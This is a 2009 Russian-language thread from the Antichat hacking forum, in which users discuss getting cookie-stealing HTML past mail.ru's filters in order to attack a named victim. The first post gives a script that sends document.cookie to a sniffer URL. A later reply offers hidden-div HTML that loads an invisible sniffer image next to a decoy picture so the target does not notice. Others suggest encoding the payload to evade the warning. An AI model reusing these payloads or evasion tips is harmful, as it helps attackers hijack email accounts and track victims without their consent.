ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Потенциально опасный HTML-код
  #1  
Старый 20.05.2009, 01:07
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile Потенциально опасный HTML-код

Проблема в слудюещем:
Я отправляю на почту жертвы (mail.ru) HTML-файл, в котором размещен скрипт для кражи куки
Код HTML:
<script>img = new Image(); img.src = "http://путь к снифферу"+document.cookie;</script>
и когда жертва открывает письмо, то видит следующее:

И резко передумывает открывать HTML-файл, как мне избежать этой красной предупредительной надписи?
 
Ответить с цитированием

  #2  
Старый 20.05.2009, 01:15
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

а как ты думаеш? ето и есть уже защита mail.ru
толк разришать уязвимость им нет.
 
Ответить с цитированием

  #3  
Старый 20.05.2009, 02:26
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

шифруй
правда может быть все шифровки они пропалили на маиле
 
Ответить с цитированием

  #4  
Старый 20.05.2009, 15:47
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile

Кто то может ответить навернека что конкретно и ка нужно сделать, и не флудить!
ЗЫ:
2 diznt
ссылка на сниффер закодирована!
 
Ответить с цитированием

  #5  
Старый 20.05.2009, 22:07
heretic1990
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
Провел на форуме:
3728999

Репутация: 444
По умолчанию

они javaScript блокируют!
 
Ответить с цитированием

  #6  
Старый 20.05.2009, 22:34
Huster
Познающий
Регистрация: 08.05.2009
Сообщений: 46
Провел на форуме:
1403678

Репутация: 55
Отправить сообщение для Huster с помощью ICQ
По умолчанию

На mail.ru ничего не сделаеш. Там защита и ее х*й обойдеш. Или мирись с этой табличкой или отправляй на другое мыло
 
Ответить с цитированием

  #7  
Старый 21.05.2009, 09:38
rezwii
Новичок
Регистрация: 05.05.2009
Сообщений: 9
Провел на форуме:
4063148

Репутация: 3
Отправить сообщение для rezwii с помощью ICQ
По умолчанию

эту защиту несколько дней назад только поставили, до этого все отправлялось, только тогда все в новом окне открывалось. если раньше как то обходили то и сейчас можно, вопрос времени.
 
Ответить с цитированием

  #8  
Старый 21.05.2009, 22:16
timeR
Новичок
Регистрация: 13.05.2009
Сообщений: 18
Провел на форуме:
216589

Репутация: 109
По умолчанию

есть у меня система одна но она вроде куки не ворует но на лог рефер выводит, + все происходит когда жертва открывает письмо мб кому пригодится,
(только репу не понижать если х%р%ю напишу хD)

PHP код:
//в имаге сорс устанавливаем путь к картинке сниффера    <div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:0px; height:0px; z-index:0"><img src="http://*****/sniff/s.gif?id=1728&"+document.cookie; border=0 width=0 height=0></div>    //в имаге сорс устанавливаем путь к картинке обычной    <div id="image2" style="position:absolute; overflow:hidden; left:0px; top:0px; width:100px; height:100px; z-index:1"><img src="http://*****/img/ganibal.jpg" border=0 width=100 height=100></div> 
+пишем письмо в "обычном режиме" жмем расширенный, отправляем письмо в черновик, пишим кому, пишим тему, отправляем.

самое интересное что этот хтмл код не фильтруется, в итоге жертве приходит письмо с картинкой, в моем случае это был ганибал (100x100) как вы поняли, жертва видит картинку и лог у нас уже на сниффе, почему нужна картинка?

ибо если мы пошлем только картинку от снифа то чаще всего ее не видно а видно рамку изображения, что есстественно напугает "дичь", а так все красиво все рульно, можете еще оформить для красоты )

Ворует ли куки?

Нет, но можно попытатся замутить ченить.

а джава причем? если даже хреф ссылки иногда блокирует

у меня опера, мозила, ие )

Последний раз редактировалось timeR; 21.05.2009 в 23:32..
 
Ответить с цитированием

  #9  
Старый 21.05.2009, 23:05
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile

не фильтрует, потому что там нет джавы!!!
ЗЫ: у тя опера?
 
Ответить с цитированием

  #10  
Старый 22.05.2009, 00:44
brain[pillow]
Участник форума
Регистрация: 07.11.2008
Сообщений: 124
Провел на форуме:
1483379

Репутация: 386
Отправить сообщение для brain[pillow] с помощью ICQ
По умолчанию

Что-то все жгут в данном топике. Всё просто - нет активной xss, знач не видать вам яваскрипта и не видать куков. Такой код мог не блочиться только наверное в первый месяц появления mail.ru, он примитивный и сейчас каждый почтовик его будет блочить. Не знаю как раньше вообще такой код мог проходить фильтр.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Коды состояния HTTP - Коды ошибок http сервера D=P=CH= MOD= *nix 6 15.10.2006 20:47
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
Что-то типа статьи по Html. Allen Болталка 8 03.03.2006 21:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ